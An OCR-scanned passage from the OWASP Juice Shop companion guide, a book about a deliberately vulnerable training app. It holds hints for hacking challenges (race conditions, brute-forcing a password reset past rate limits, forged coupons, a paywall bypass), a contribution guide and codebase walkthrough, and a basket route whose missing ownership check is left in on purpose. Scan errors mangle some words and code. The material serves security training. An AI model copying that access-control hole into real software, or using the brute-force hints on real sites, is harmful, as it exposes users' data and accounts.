give its customers the ability to give a "like" to their favorite reviews. Of course, 
each user should be able to do so only once for each review. 


e Every user is (almost) immediately associated with the review they "liked" to 
prevent abuse of that functionality 

e Did you really think clicking the "like" button three times in a row really fast 
would be enough to solve a xxx» Challenge? 

e The underlying flaw of this challenge is a Race Condition 


A race condition or race hazard is the behavior of an electronics, software, 
or other system where the output is dependent on the sequence or timing 
of other uncontrollable events. It becomes a bug when events do not 
happen in the order the programmer intended.° 


Many software race conditions have associated computer security 
implications. A race condition allows an attacker with access to a shared 
resource to cause other actors that utilize that resource to malfunction, 
resulting in effects including denial of service and privilege escalation. 


A specific kind of race condition involves checking for a predicate (e.g. for 
authentication), then acting on the predicate, while the state can change 
between the time of check and the time of use. When this kind of bug exists 
in security-sensitive code, a security vulnerability called a time-of-check-to- 
time-of-use (TOCTTOU) bug is created. 


Reset Morty's password via the Forgot Password 
mechanism 


This password reset challenge is different from those from the Broken 
Authentication category as it is next to impossible to solve without using a brute 
force approach. 


e Finding out who Morty actually is, will help to reduce the solution space. 
e You can assume that Morty answered his security question truthfully but 
employed some obfuscation to make it more secure. 
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e Morty's answer is less than 10 characters long and does not include any 
special characters. 

e Unfortunately, Forgot your password? is protected by a rate limiting 
mechanism that prevents brute forcing. You need to beat this somehow. 


1 
https:/Awww.owasp.org/index.php/OWASP_Automated_Threats_to_Web_A 
pplications e 

2 
https:/Awww.owasp.org/index.php/Blocking_Brute_Force_Attacks#Sidebar:_ 
Using _CAPTCHAS © 

3 
https:/Awww.owasp.org/index.php/OWASP_2014_Project_Handbook#tab=P 
roject_Requirements + 


4 https://www.owasp.org/index.php/Brute_force_attack e 


5 https://en.wikipedia.org/wiki/Race_condition @ 


6 https://en.wikipedia.org/wiki/Race_condition#Computer_security @ 
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Cryptographic Issues 


Challenges covered in this chapter 


Name Description Difficulty 
Forged Forge a coupon code that gives youa 
Coupon discount of at least 80%. KARI 
Imaginary Solve challenge #999. Unfortunately, this 
Challenge challenge does not exist. okok 
Nested F 
Easter Apply some advanced cryptanalysis to find KARK 

the real easter egg. 
Egg 
Premium Unlock Premium Challenge to access 
Paywall exclusive content. okok 
Weird Inform the shop about an algorithm or 

library it should definitely not use the way it nk 
Crypto does. 


Forge a coupon code that gives you a discount of at 
least 80% 


This is probably one of the hardest challenges in the OWASP Juice Shop. As you 
learned during the "happy path" tour, the web shop offers a Coupon field to get a 
discount on your entire order during checkout. The challenge is to get a discount 
of at least 80% on an order. As no coupons with this high a discount are 
published, it is up to you to forge your own. 


e One viable solution would be to reverse-engineer how coupon codes are 
generated and craft your own 80% coupon by using the same (or at least 
similar) implementation. 

e Another possible solution might be harvesting as many previous coupon as 
possible and look for patterns that might give you a leverage for a brute force 
attack. 

e Ifall else fails, you could still try to blindly brute force the coupon code field 
before checkout. 


Solve challenge #999 


The OWASP Juice Shop is so broken that even its convenience features (which 
have nothing to do with the e-commerce use cases) are designed to be 
vulnerable. One of these features is Automatic saving and restoring hacking 
progress after a server crash or a few days pause. 


In order to not mess with the real challenges accidentally, the challenge is to fake 
a signal to the application that you successfully solved challenge #999 - which 
does not exist. 
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e Find out how saving and restoring progress is done behind the scenes 

e Deduce from all available information (e.g. the package.json.bak ) how the 
application encrypts and decrypts your hacking progress. 

e Other than the user's passwords, the hacking progress involves an additional 
secret during its encryption. 

e What would be a really stupid mistake a developer might make when 
choosing such a secret? 


Apply some advanced cryptanalysis to find the real 
easter egg 


Solving the Find the hidden easter egg challenge was probably no as satisfying 
as you had hoped. Now it is time to tackle the taunt of the developers and hunt 
down the real easter egg. This follow-up challenge is basically about finding a 
secret URL that - when accessed - will reward you with an easter egg that 
deserves the name. 


e Make sure you solve Find the hidden easter egg first. 
e You might have to peel through several layers of tough-as-nails encryption for 
this challenge. 


Unlock Premium Challenge to access exclusive 
content 


These days a lot of seemingly free software comes with hidden or follow-up costs 
to use it to its full potential. For example: In computer games, letting players pay 
for Downloadable Content (DLC) after they purchased a full-price game, has 
become the norm. Often this is okay, because the developers actually added 
something worth the costs to their game. But just as often gamers are supposed 
to pay for just unlocking features that were already part of the original release. 


This hacking challenge represents the latter kind of "premium" feature. /t only 
exists to rip you hackers off! Of course you should never tolerate such a business 
policy, let alone support it with your precious Bitcoins! 


That is why the actual challenge here is to unlock and solve the "premium" 
challenge bypassing the paywall in front of it. 


e There is no inappropriate, self-written or misconfigured cryptographic library 
to be exploited here. 
e How much protection does a sturdy top-quality door lock add to your house if 
you... 
o ...put the key under the door mat? 
o ...hide the key in the nearby plant pot? 
o ...tape the key to the underside of the mailbox? 
e Once more: You do not have to pay anything to unlock this challenge! 


Side note: The Bitcoin address behind the taunting Unlock button is actually 
a valid address of the author. So, if you'd like to donate a small amount for 
the ongoing maintenance and development of OWASP Juice Shop - feel 
free to actually use it! More on donations in part 3 of this book. 
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Inform the shop about an algorithm or library it 
should definitely not use the way it does 


To fulfil this challenge you must identify a cryptographic algorithm (or crypto 
library) that either 


e should not be used at all 
e oris a bad choice for a given requirement 
e or is used in an insecure way. 


Initially confined to the realms of academia and the military, cryptography 
has become ubiquitous thanks to the Internet. Common every day uses of 
cryptography include mobile phones, passwords, SSL, smart cards, and 
DVDs. Cryptography has permeated everyday life, and is heavily used by 
many web applications. 


Cryptography (or crypto) is one of the more advanced topics of information 
security, and one whose understanding requires the most schooling and 
experience. It is difficult to get right because there are many approaches to 
encryption, each with advantages and disadvantages that need to be 
thoroughly understood by web solution architects and developers. In 
addition, serious cryptography research is typically based in advanced 
mathematics and number theory, providing a serious barrier to entry. 


The proper and accurate implementation of cryptography is extremely 
critical to its efficacy. A small mistake in configuration or coding will result in 
removing a large degree of the protection it affords and rending the crypto 
implementation useless against serious attacks. 


A good understanding of crypto is required to be able to discern between 
solid products and snake oil. The inherent complexity of crypto makes it 
easy to fall for fantastic claims from vendors about their product. Typically, 
these are “a breakthrough in cryptography” or “unbreakable” or provide 
"military grade" security. If a vendor says "trust us, we have had experts 
look at this,” chances are they weren't experts! 


e Use the Contact Us form to submit a feedback mentioning the abused 
algorithm or library. 

e There are five possible answers and you only need to identify one to solve 
the challenge. 

e Cryptographic functions only used in the Apply some advanced cryptanalysis 
to find the real easter egg challenge do not count as they are only a 
developer's prank and not a serious security problem. 


1, https://www.owasp.org/index.php/Guide_to_Cryptography e 
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Miscellaneous 


Challenges covered in this chapter 


Name Description Difficulty 
Privacy : ; 

Policy Read our privacy policy. * 

Score : 3 

Board Find the carefully hidden 'Score Board' page. * 
Security Behave like any "white hat" should before nee 
Policy getting into the action. 


Read our privacy policy 


A privacy policy is a statement or a legal document (in privacy law) that 
discloses some or all of the ways a party gathers, uses, discloses, and 
manages a customer or client's data. It fulfills a legal requirement to protect 
a customer or client's privacy. Personal information can be anything that 
can be used to identify an individual, not limited to the person's name, 
address, date of birth, marital status, contact information, ID issue, and 
expiry date, financial records, credit information, medical history, where one 
travels, and intentions to acquire goods and services. In the case of a 
business it is often a statement that declares a party's policy on how it 
collects, stores, and releases personal information it collects. It informs the 
client what specific information is collected, and whether it is kept 
confidential, shared with partners, or sold to other firms or enterprises. 
Privacy policies typically represent a broader, more generalized treatment, 
as opposed to data use statements, which tend to be more detailed and 
specific. 


The exact contents of a certain privacy policy will depend upon the 
applicable law and may need to address requirements across geographical 
boundaries and legal jurisdictions. Most countries have their own legislation 
and guidelines of who is covered, what information can be collected, and 
what it can be used for. In general, data protection laws in Europe cover the 
private sector as well as the public sector. Their privacy laws apply not only 
to government operations but also to private enterprises and commercial 
transactions. 1 


e When you work with the application you will most likely solve this challenge in 
the process 

e Any automated crawling or spidering tool you use might solve this challenge 
for you 

e There is no real hacking involved here 


Find the carefully hidden 'Score Board" page 
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This challenge was already covered in Finding the Score Board at the beginning 
of Part Il - Challenge hunting. 


Behave like any "white hat" should before getting 
into the action 


The term "white hat" in Internet slang refers to an ethical computer hacker, 
or a computer security expert, who specializes in penetration testing and in 
other testing methodologies to ensure the security of an organization's 
information systems. Ethical hacking is a term meant to imply a broader 
category than just penetration testing. Contrasted with black hat, a 
malicious hacker, the name comes from Western films, where heroic and 
antagonistic cowboys might traditionally wear a white and a black hat 
respectively. 


e This challenge asks you to act like an ethical hacker 

e As one of the good guys, would you just start attacking an application without 
consent of the owner? 

e You also might want to ready the security policy or any bug bounty program 
that is in place 


i https://en.wikipedia.org/wiki/Privacy_policy @ 


2 https://en.wikipedia.org/wiki/White_hat_(computer_security) @ 
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Part Ill - Getting involved 


If you enjoyed hacking the OWASP Juice shop and you would like to be informed 
about upcoming releases, new challenges or bugfixes, there are plenty of ways to 
stay tuned. 


Social Media Channels 


Channel Link 

Twitter https://twitter.com/owasp_juiceshop 

Facebook https://www.facebook.com/owasp.juiceshop 
Youtube https://www. youtube.com/playlist? 

Playlist list=PLV9O4rlovHhO1y8_78GZfMbH6oznyx2g2 
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Provide feedback 


e Did you experience a functional bug when hacking the application? 


e Did the app server crash after you sent some malformed HTTP request? 


e Were you sure to have solved a challenge but it did not light up on the score 


board? 


e Do you think you found an accidental vulnerability that could be included and 


tracked on the score board? 


e Do you disagree with the difficulty rating for some of the challenges? 


e Did you spot a misbehaving UI component or broken image? 


e Did you enjoy a conference talk, podcast or video about OWASP Juice Shop 


that is missing in our references compilation on GitHub? 


In all the above (as well as other similar) cases, please reach out to the OWASP 


Juice Shop team, project leader or community! 


Feedback Channels 


Channel 


OWASP 
Slack 
Channel 


Gitter Chat 
Reddit 


Google 
Groups 
Forum 


Project 
Mailing List 
(on Google 
Groups) 


GitHub 
Issues 


Link 


https://owasp.slack.com/messages/project-juiceshop 


https://gitter.im/bkimminich/juice-shop 


https://www.reddit.com/r/owasp_juiceshop 


https://groups.google.com/a/owasp.org/forum/#!forum/juice- 
shop-project 


juice-shop-project@owasp.org 


https://github.com/bkimminich/juice-shop/issues 


Your honest feedback is always appreciated, no matter if it is positive or negative! 
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Contribute to development 


If you would like to contribute to OWASP Juice Shop but need some idea what 
task to address, the best place to look is in the GitHub issue lists at 
https://github.com/bkimminich/juice-shop/issues. 


© help wanted © good first issue 


e Issues labelled with help wanted indicate tasks where the project team 
would very much appreciate help from the community 

e Issues labelled with good first issue indicate tasks that are isolated and not 
too hard to implement, so they are well-suited for new contributors 


The following sections describe in detail the most important rules and processes 
when contributing to the OWASP Juice Shop project. 


Tips for newcomers 


If you are new to application development - particularly with Angular and 
Express.js - it is recommended to read the Codebase 101 to get an overview what 
belongs where. It will lower the entry barrier for you significantly. 


Version control 


The project uses git as its version control system and GitHub as the central 
server and collaboration platform. OWASP Juice Shop resides in the following 
repository: 


https://github.com/bkimminich/juice-shop 


Branching model 


OWASP Juice Shop is maintained in a simplified Gitflow fashion, where all active 
development happens on the develop branch while master is used to deploy 
stable versions to the Heroku demo instance and later create tagged releases 
from. 


Feature branches are only used for long-term tasks that could jeopardize regular 
releases from develop in the meantime. Likewise prototypes and experiments 
must be developed on an individual branch or a distinct fork of the entire project. 


Versioning 


Any release from master is tagged with a unique version in the format 


VMAJOR.MINOR.PATCH , for example v1.3.0 OF v4.1.2. 
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Given a version number major.MINOR.PATCH , increment the: 


1. major version when you make incompatible API changes, 

2. minor version when you add functionality in a backwards-compatible 
manner, and 

3. patch version when you make backwards-compatible bug fixes. ! 


The current version of the project (omitting the leading v ) must be manually 
maintained in the following three places: 


e /package.json inthe "version" property 
e /frontend/package.json inthe "version" property 


e /Dockerfile inthe LaBeEL named org.opencontainers. image. version 


All other occurrences of the version (i.e. packaged releases & the menu bar of the 
application itself) are resolved through the "version" property of /package.json 
automatically. 


Pull requests 


Using Git-Flow means that PRs have the highest chance of getting accepted and 
merged when you open them on the develop branch of your fork. That allows for 
some post-merge changes by the team without directly compromising the master 
branch, which is supposed to hold always be in a release-ready state. 


It is usually not a big deal if you accidentally open a PR for the master branch. 
GitHub added the possibility to change the target branch for a PR afterwards 
some time ago. 


Contribution guidelines 


The minimum requirements for code contributions are: 


1. The code must be compliant with the JS Standard Code Style rules or their 
correspondingly configured TSLint and Sass Lint rules. 

2. All new and changed code should have a corresponding unit and/or 
integration test. 

3. New and changed challenges must have a corresponding e2e test. 

4. Linting, as well as all unit, integration and e2e tests should pass locally 
before opening a Pull Request. 

5. All Git commits within a PR must be signed off to indicate the contributor's 
agreement with the Developer Certificate of Origin. 


Linting 





J Standard 
Code Style 





npm run lint 
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The npm run lint script verifies code compliance with 


e the standard code style (for all server-side JavaScript code) 

e the tslint rules for the frontend TypeScript code (which are defined to be 
equal to standard by deriving from tslint-config-standard ) 

e the sass-lint rules (for all frontend SCSS code) 


If PRs deviate from this coding style, they will the build and will not be merged 
until made compliant. 


In case your PR is failing from style guide issues try running npm run lint: fix 
over your code - this will fix all syntax or code style issues automatically without 
breaking your code. 


Testing 


npm test 
npm run frisby 





npm run protractor # run al 


Pull Requests are verified to pass all of the following test stages during the 
continuous integration build. It is recommended that you run these tests on your 
local computer to verify they pass before submitting a PR. New features should 
be accompanied by an appropriate number of corresponding tests to verify they 
behave as intended. 


Unit tests 


There is a full suite containing isolated unit tests 


e for all client-side code in frontend/src/app/**/*.spec.ts 
e for the server-side routes and libraries in test/server/*Spec.js 


npm test 


Integration tests 


The integration tests in test/api/*spec.js verify if the backend for all normal use 
cases of the application works. All server-side vulnerabilities are also tested. 


npm run frisby 


These tests automatically start a server and run the tests against it. A working 
internet connection is recommended. 


End-to-end tests 


The e2e test suite in test/e2e/*sSpec.js verifies if all client- and server-side 
vulnerabilities are exploitable. It passes only when all challenges are solvable on 
the score board. 
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npm run protractor 


The end-to-end tests require a locally installed Google Chrome browser and 
internet access to be able to pass. 


If you have a web proxy configured via HTTp_proxy environment variable, the end- 
to-end tests will honor this setting. This can be useful to e.g. run the tests through 
tools like OWASP ZAP or Burpsuite. 


Testing packaged distributions 


During releases the application will be packaged into .zip/ .tgz archives for 
another easy setup method. When you contribute a change that impacts what the 
application needs to include, make sure you test this manually on your system. 


npm install --production && grunt package 


Then take the created archive from /dist and follow the steps described above 
in Packaged Distributions to make sure nothing is broken or missing. 


Developer Certificate of Origin 


145 


The Developer Certificate of Origin (DCO) is a lightweight way for 
contributors to certify that they wrote or otherwise have the right to submit 
the code they are contributing to the project. Here is the full text of the 
DCO, reformatted for readability: 


By making a contribution to this project, | certify that: 


(a) The contribution was created in whole or in part by me and | have 
the right to submit it under the open source license indicated in the 
file; or 


(b) The contribution is based upon previous work that, to the best of 
my knowledge, is covered under an appropriate open source license 
and | have the right under that license to submit that work with 
modifications, whether created in whole or in part by me, under the 
same open source license (unless | am permitted to submit under a 
different license), as indicated in the file; or 


(c) The contribution was provided directly to me by some other 
person who certified (a), (b) or (c) and | have not modified it. 


(d) | understand and agree that this project and the contribution are 
public and that a record of the contribution (including all personal 
information | submit with it, including my sign-off) is maintained 
indefinitely and may be redistributed consistent with this project or 
the open source license(s) involved. 


Contributors sign-off that they adhere to these requirements by adding a 
Signed-off-by line to commit messages. 


This is my commit message 


Signed-off-by: Random J Developer <random@developer.example.org> 


Git even has a -s command line option to append this automatically to 
your commit message: 


$ git commit -s -m 'This is my commit message’ 


Continuous integration & deployment 


Travis-Cl 
The main build and Cl server for OWASP Juice Shop is set up on Travis-Cl: 
https://travis-ci.org/bkimminich/juice-shop 


On every push to GitHub, a build is triggered on Travis-Cl. A build consists of 
several stages in which one or more jobs are executed. Not only direct pushes to 
the master and develop branches are built, but Pull Requests from other 
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branches or forks as well. This helps the project team to assess if a PR can be 


safely merged into the codebase. For tag-builds (i.e. versions to be released) the 
some additional steps are necessary to package the release-artifacts for Linux, 


MacOS and Windows for each supported Node.js version and attach these to the 


release page on GitHub. Lastly, not all stages are executed for all supported 
Node.js versions in order to shorten the feedback loop. The higher-level 


integration and e2e tests are only run for the officially preferred Node.js version 


12.x. 


> Stage 
Trigger¥ 


Push to 
develop 


Push to 


master 


Pull 
Request 


Version 
tag 


Lint 


Linting 
on 
Node.js 
12.x 


Test 


Unit tests 
on Node.js 
10.x and 
12.x 


v 


X instead 
compile and 
release pre- 
packaged 
distributions 
for Linux 
with 
Node.js 
10.x and 
12.x to 
GitHub 


Integration 


Integration 
tests and 
re-run Unit 
tests on 
Node.js 
12.x and 
publish 
combined 
coverage 
data to 
Code 
Climate 


v 


x 


E2e 


End-to- 
end 
tests 
on 
Node.js 
12.x 


Deplc 


Deplc 
Herok 


V tol 
stagir 


V tot 
shop. 


x 


© The stages in the table above are executed sequentially from left to right. A 


failing job in any stage will break the build and all following stages will not be 


executed allowing a faster feedback loop. The table only depicts the setup for 


Linux, as this is where all tests are executed. In the MacOS and Windows jobs 


only npm install is executed and release-artifacts are assembled in tag-builds. 


1 . http://semver.org e 


2 


. https://probot.github.io/apps/dco/ + 
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Codebase 101 


Jumping head first into any foreign codebase can cause a little headache. This 
section is there to help you find your way through the code of OWASP Juice 
Shop. On its top level the Juice Shop codebase is mainly separated into a client 
and a server tier, the latter with an underlying lightweight database and file system 
as storage. 


Client Tier 


OWASP Juice Shop uses the popular Angular framework as the core of its client- 
side. Thanks to Angular Material - an Angular-specific implementation of Google's 
Material Design - the UI looks nicely familiar and is easy to use. It is also built to 
be responsive with the help of Angular Flex-Layout, letting it adapt nicely to 
different screen sizes. The various icons used throughout the frontend are from 
the vast Font Awesome 5 collection. 


@ Please note that all client-side code is written in Typescript which is 
compiled into regular JavaScript during the build process. 


Browser 














Services 


Service is a broad category encompassing any value, function, or feature 
that an app needs. A service is typically a class with a narrow, well-defined 
purpose. It should do something specific and do it well. 


Angular distinguishes components from services to increase modularity and 
reusability. By separating a component's view-related functionality from 
other kinds of processing, you can make your component classes lean and 


efficient. 1 


The client-side Angular services reside in the frontend/src/app/Services folder. 
Each service file handles all RESTful HTTP calls to the Node.js backend for a 
specific domain entity or functional aspect of the application. 


148 





Service functions must always use Angular's own Httpclient to make any 


backend calls. 
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The following code snippet shows how all services in the OWASP Juice Shop 
client are structured using the example of FeedbackService . It wraps the 
/api/Feedback API which offers a cet , post and pbeLete endpoint to find, create 
and delete Feedback of users: 


import { environment } from '../../environments/environment' 


import { Injectable } from '‘@angular/core' 
import { HttpClient } from ‘@angular/common/http' 
import { catchError, map } from 'rxjs/operators' 


@Injectable({ 
providediIn: ‘root' 


}) 


export class FeedbackService { 


private hostServer = environment.hostServer 
private host = this.hostServer + '/api/Feedbacks' 


constructor (private http: HttpClient) { } 


find (params?: any) { 
return this.http.get(this.host + '/' , { 
params: params 
}).pipe(map((response: any) => response.data), catchError((err) => { 
throw err 


})) 


save (params) { 
return this.http.post(this.host + '/', params).pipe(map((response: any) => 
response.data), catchError((err) => { throw err })) 


del (id) { 
return this.http.delete(this.host + '/' + id).pipe(map((response: any) => 
response.data), catchError((err) => { throw err })) 


Unit tests for all services can be found next to their *.service.ts files in the 
frontend/src/app/Services folder as * service.spec.ts files. They are Jasmine 2 
specifications which are executed by the Karma test runner. 


Components 
A component controls a patch of screen called a view. 


[L] 


You define a component's application logic—what it does to support the 
view—inside a class. The class interacts with the view through an API of 


properties and methods. 


The Angular components reside inside frontend/src/app as a subfolder for each 
individual component. Each component is responsible for one screen portion of 
the application. It consists of the component itself ( *.component.ts ) and the HTML 
Template ( *.component.html ) along with its styles ( *.component.scss ). 
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Components must always go through one or more ss when communicating 
with the application backend. 
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The code snippet below shows the contactComponent which handles the Contact 
Us screen and uses three different services to fulfill its tasks: 


e UserService to retrieve data about the currently logged in user (if applicable) 
via the whoami() function 

e CaptchaService to retrieve anew CAPTCHA for the user to solve via the 
getCaptcha() function 


e FeedbackService to eventually save() the user feedback 


v As a universal rule for the entire Juice Shop codebase, unnecessary code 
duplication as well as deeply nested 25-code should be avoided by using well- 
named & small helper functions. This is demonstrated by the very simple 
getNewCaptcha() and resetForm() functions in the code snippet below. Helper 
functions should always be located as close to the calling code as possible. 
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import { FeedbackService } from '../Services/feedback.service’ 

import { CaptchaService } from '../Services/captcha.service' 

import { UserService } from '../Services/user.service' 

import { FormControl, Validators } from '‘@angular/forms' 

import { Component, OnInit } from ‘@angular/core' 

import { library, dom } from '@fortawesome/fontawesome-svg-core' 

import { faPaperPlane, faStar } from ‘@fortawesome/free-solid-svg-icons' 


library.add(faStar, faPaperPlane) 
dom.watch() 


@Component ({ 
selector: ‘app-contact’, 
templateUrl: './contact.component.html', 
styleUrls: ['./contact.component.scss'] 


}) 


export class ContactComponent implements OnInit { 


public authorControl: FormControl = 
new FormControl({ value: '', disabled: true }, []) 
public feedbackControl: FormControl = 
new FormControl('', [Validators.required, Validators.maxLength(16@) ]) 
public captchaControl: FormControl = 
new FormControl('', [Validators.required]) 
public userIdControl: FormControl = new FormControl('', []) 
public rating: number = @ 
public feedback: any = undefined 
public captcha: any 
public captchalId: any 
public confirmation: any 
public error: any 


constructor ( 
private userService: UserService, 
private captchaService: CaptchaService, 
private feedbackService: FeedbackService) { } 


ngOnInit () { 

this.userService.whoAmI().subscribe((data: any) => { 
this.feedback = {} 
this.userIdControl.setValue(data.id) 
this.feedback.UserId = data.id 
this.authorControl.setValue(data.email || ‘anonymous') 

}, (err) => { 
this.feedback = undefined 
console.log(err) 


J) 
this.getNewCaptcha() 


getNewCaptcha () { 
this.captchaService.getCaptcha().subscribe((data: any) => { 
this.captcha = data.captcha 
this.captchaId = data.captchalId 
}, (err) => err) 


save () { 
this.feedback.captchaId = this.captchaId 


this.feedback.captcha = this.captchaControl.value 

this.feedback.comment = this.feedbackControl.value 
this.feedback.rating = this.rating 

this.feedback.UserId = this.userIdControl.value 
this.feedbackService.save(this.feedback).subscribe((savedFeedback) => { 


this.error = null 
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this.confirmation = ‘Thank you for your feedback’ + 
(savedFeedback.rating === 5 ? ' and your 5-star rating!’ : '.') 
this.feedback = {} 
this .ngOnInit() 
this.resetForm() 
}, (error) => { 
this.error = error.error 
this.confirmation = null 
this.feedback = {} 
this.resetForm() 


}) 


resetForm () { 
this.authorControl.markAsUntouched() 
this.authorControl.markAsPristine() 
this.authorControl.setValue(' ') 
this.feedbackControl.markAsUntouched() 
this.feedbackControl.markAsPristine() 
this.feedbackControl.setValue(' ') 
this.captchaControl.markAsUntouched( ) 
this.captchaControl.markAsPristine() 
this.captchaControl.setValue('') 


Unit tests for all components can be found in their subfolders within 
frontend/src/app/ aS *.component.spec.ts files. They are Jasmine 2 specifications 
which are executed by the Karma test runner. 


Templates 


The Angular application manages what the user sees and can do, 
achieving this through the interaction of a component class instance (the 
component) and its user-facing template. 


You may be familiar with the component/template duality from your 
experience with model-view-controller (MVC) or model-view-viewmodel 
(MVVM). In Angular, the component plays the part of the 
controller/viewmodel, and the template represents the view. 


Each screen within the application is defined in a HTML view template along with 
its Component in the subfolders beneath frontend/src/app/ . The views are written 
as HTML using Angular Material for styling and Angular Flex-Layout for 
responsiveness. Furthermore most views incorporate icons from the Font 
Awesome 5 collection. 


@ Understanding the Declarative HTML APIs of the Angular Layout is crucial to 
be able to write Ul elements or entire screens without breaking responsiveness! 


The following code snippet shows the contact.component.htm1 view which - 
together with the previously shown contractComponent Class and its associated 
styles in contact.component.scss - represents the entire Contact Us screen. 
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<div fxLayoutAlign="center"> 
<mat-card> 
<h3 translate>TITLE_CONTACT</h3> 


<div *ngIf="confirmation"> 
<p class="confirmation">{{confirmation}}</p> 
</div> 
<div *ngIf="error"> 
<p class="error">{{error}}</p> 
</div> 


<div class="form-container"> 


<input hidden type="text" id="userId" [formControl]="userIdControl"/> 


<mat-form-field appearance="outline"> 

<mat-label translate>LABEL_AUTHOR</mat-label> 

<input [formControl]="authorControl" matInput type="text"> 
</mat-form-field> 


<mat-form-field appearance="outline"> 
<mat-label translate>LABEL_COMMENT</mat-label> 
<textarea id="comment" [formControl]="feedbackControl" matInput></textarea> 
<mat-error *ngIf="feedbackControl.invalid && feedbackControl.errors.required" 
MANDATORY_COMMENT 
</mat-error> 
</mat-form-field> 


<div style="margin-top:5px;" class="rating-container"> 


<label style="font-weight:bold; margin-right: 8px;" translate> 
LABEL_RATING 
</label> 
<bar-rating [(rate)]="rating" [max]="5"></bar-rating> 
</div> 


<mat-form-field> 
<label style="font-weight:bold;" translate>LABEL_CAPTCHA</label>&nbsp; 
<code id="captcha">{{captcha}}</code>&nbsp;<label>?</label> 
<input id="captchaControl" [formControl]="captchaControl" matInput type="text" 
<mat-error *ngIf="captchaControl.invalid && captchaControl.errors.required” tr 
MANDATORY_CAPTCHA 
</mat-error> 
</mat-form-field> 


</div> 


<button type="submit" id="submitButton" style="margin-top:5px;" 
mat-raised-button color="primary" 
[disabled]="authorControl.invalid || feedbackControl.invalid || captchaCor 
(click)="save()"> 
<i class="fas fa-paper-plane fa-lg"></i> {{'BTN_SUBMIT' | translate}} 
</button> 


</mat-card> 
</div> 


@ In the entire Juice Shop code base, inline templates are never used. Templates 


must always be described in separate .htmı files. 


Internationalization 
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All static texts in the user interface are fully internationalized using the ngx- 
translate module. Texts coming from the server (e.g. product descriptions or 
server error messages) are always in English. 


No hard-coded texts are allowed in any of the Templates or Components. Instead, 
property keys have to be defined and are usually applied with a translate 

attribute that can be placed in most HTML tags. You might have noticed several of 
these translate attributes in the contact.component.html code snippet from the 
Templates section. 


The different translations are maintained in JSON files in the 
/frontend/src/assets/i1sn folder. The only file that is allowed to be touched by 
developers is the en.json file for the original English texts. New properties are 
exclusively added here. When pushing the develop branch to GitHub, the online 
translation provider will pick up changes in en.json and adapt all other language 
files accordingly. All this happens behind the scenes in a distinct branch 
11@n_develop which will be manually merged back into develop on a regular 
basis. 


To learn about the actual translation process please refer to the chapter Helping 
with translations. 


Client-side code compilation 


All client side Angular code is compiled into JavaScript and afterwards uglified (for 
security by obscurity) and minified (for initial load time reduction) during the build 
process (launched with npm install ) of the application. This creates an 
frontend/dist/frontend folder, which is the one actually delivered to the Browser to 
load all application-specific client-side code. 


@ If you want to quickly test client-side code changes, it can be cumbersome and 
slow to launch npm install over and over again. Instead you can use npm run 
serve to keep let Angular watch for client-code changes and recompile the 
affected parts on the fly. You usually not even have to manually refresh your 
browser with rs to see your changes. 


Server Tier 


The backend of OWASP Juice Shop is a Node.js application based on the 
Express web framework. 
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@ On the server side all JavaScript code must be compliant to javascript (ES6) 
syntax. 


Routes 


Routing refers to determining how an application responds to a client 
request to a particular endpoint, which is a URI (or path) and a specific 
HTTP request method (GET, POST, and so on). 


Each route can have one or more handler functions, which are executed 


when the route is matched.“ 


Routes are defined via the the Express framework and can be handled by any of 
the following middlewares: 


e An automatically generated API endpoint for one of the exposed tables from 
the application's Data model 
e A hand-written middleware which encapsulates some business or technical 
responsibility 
e Some third-party middleware that fulfills a non-functional requirement such as 
o file serving (via serve-index and serve-favicon ) 
o adding HTTP security headers (via helmet and cors ) 
o extracting cookies from HTTP requests (via cookie-parser ) 
o writing access logs (via morgan ) 
o catching unhandled exceptions and presenting a default error screen (via 


errorhandler ) 


Integration tests for all routes can be found in the test/api folder alongside all 
other API endpoint tests, from where Frisby.js/Jest assert the functionality of the 
entire backend on HTTP-request/response level. 


Generated API endpoints 


Juice Shop uses the finale-rest middleware to automatically create REST 
endpoints for most of its Sequelize models. For e.g. the user model the 
generated endpoints are: 


e /api/Users accepting 
o GET requests to retrieve all (or a filtered list of) user records 
o and post requests to create a new user record 
e /api/Users/{id} accepting 
o eT requests to retrieve a single user record by its database ID 
o patch requests to update a user record 
o DELETE requests to delete a user record 


Apart from the user model also the Product , Feedback , BasketItem , Challenge , 
Complaint , Recycle , SecurityQuestion and SecurityAnswer models are exposed in 
this fashion. 


Not all HTTP verbs are accepted by every endpoint. Furthermore, some 
endpoints are protected against anonymous access and can only be used by an 
authenticated user. This is described later in section Access control on routes. 
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finale. initialize({ 
app, 
sequelize: models.sequelize 


H» 


const autoModels = ['User', 'Product', 'Feedback', 
'BasketItem', ‘Challenge’, 'Complaint', 'Recycle', 
'SecurityQuestion', 'SecurityAnswer'] 


for (const modelName of autoModels) { 
const resource = finale.resource({ 
model: models[modelName], 
endpoints: [~/api/${modelName}s>, ~/api/${modelName}s/:id~ ] 
H) 


// fix the api difference between finale (fka epilogue) and previously 
// used sequlize-restful 
resource.all.send.before((req, res, context) => { 
context.instance = { 
status: ‘success’, 
data: context.instance 


} 


return context. continue 


}) 


Hand-written middleware 


The business functionality in the application backend is separated into tightly 
scoped middleware components which are placed in the routes folder. 
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{ 





These middleware components are directly mapped to Express routes. 


Each middleware exposes a single function which encapsulates their 
responsibility. For example, the angular.js middleware delivers the index.htm1 
page to the client: 
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const path = require('path') 
const utils = require('../lib/utils') 


module.exports = function serveAngularClient () { 
return ({url}, res, next) => { 
if (futils.startsWith(url, ‘/api') && !utils.startsWith(url, ‘/rest')) { 


res.sendFile(path.resolve(_ dirname, '../app/index.html')) 
} else { 
next(new Error('Unexpected path: ' + url)) 


If a hand-written middleware is involved in a hacking challenge, it must assess on 
its own if the challenge has been solved. For example, in the basket.js 
middleware where successfully accessing another user's shopping basket is 
verified: 


const utils = require('../lib/utils') 

const insecurity = require('../lib/insecurity') 

const models = require('../models/index') 

const challenges = require('../data/datacache').challenges 


module.exports = function retrieveBasket () { 
return (req, res, next) => { 
const id = req.params.id 
models.Basket.find({ where: { id }, include: [ { model: models.Product, paranoid: 
.then(basket => { 
if (utils.notSolved(challenges.basketChallenge)) { 
const user = insecurity.authenticatedUsers.from(req) 
if (user && id && id !== ‘undefined’ && user.bid != id) { 
utils.solve(challenges.basketChallenge) 


} 
res.json(utils.queryResultToJson(basket) ) 
}).catch(error => { 


next (error) 


H) 


The only middleware deviating from above specification is verify.js . It contains 
no business functionality. Instead of one function it exposes several named 
functions on challenge verification for Generated API endpoints, for example: 


app.post('/api/Feedbacks', verify.forgedFeedbackChallenge()) 
app.post('/api/Feedbacks', verify.captchaBypassChallenge()) 


The same applied for any challenges on top of third-party middleware, for 
example: 


app.use(verify.errorHandlingChallenge()) 
app.use(errorhandler()) 
